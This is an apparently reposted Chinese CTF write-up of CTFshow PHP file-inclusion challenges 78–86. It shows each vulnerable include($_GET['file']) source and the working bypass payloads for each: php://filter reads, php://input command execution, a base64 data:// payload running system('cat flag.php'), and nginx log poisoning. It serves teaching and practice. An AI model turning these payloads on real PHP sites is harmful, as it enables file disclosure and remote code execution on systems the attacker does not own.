前言

1.什么是文件包含？

通過PHP函數引入文件時，傳入的文件名沒有經過合理的驗證，從而操作了預想之外的文件，就可能導致意 外的文件泄漏甚至惡意代碼注入。

2.文件包含的要求是什么？

alow_url_fopen=On(默認為On) 規定是否允許從遠程服務器或者網站檢索數據 allow_url_include=On(php5.2之后默認為Off) 規定是否允許include/require遠程文件

3.通過什么觸發？
通過php函數例如include，require等等
include只生成警告但是會繼續執行
require生成警告但是停止執行

include包含txt也會把里面的內容當做php代碼來執行。

78

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];include($file); }else{highlight_file(__FILE__); }

偽協議隨意操作?file=php://filter/read=convert.base64-encode/resource=flag.php
當然這是知道flag在哪的時候，可以先?file=php://input
然后post傳php代碼就可以直接執行，但是最好是用bp來做
先`<?php system("ls");?>.
再cat flag.php即可

79

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);include($file); }else{highlight_file(__FILE__); }

過濾了php
用data來讀
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

80、81

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file); }else{highlight_file(__FILE__); }

data也過濾了，用日志包含試試，可以包含我們自己的文件，先發個請求

然后file=/var/log/nginx/access.log
然后ls cat fl0g.php

82-86

<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 19:34:45 # @email: h1xa@ctfer.com # @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file); }else{highlight_file(__FILE__); }

句號沒了，日志包含不了,可以利用session.upload_progress進行文件包含，然后條件競爭，rce。腳本就不放了，網上很多

總結

以上是生活随笔為你收集整理的[CTF]CTFSHOW文件包含练习笔记的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。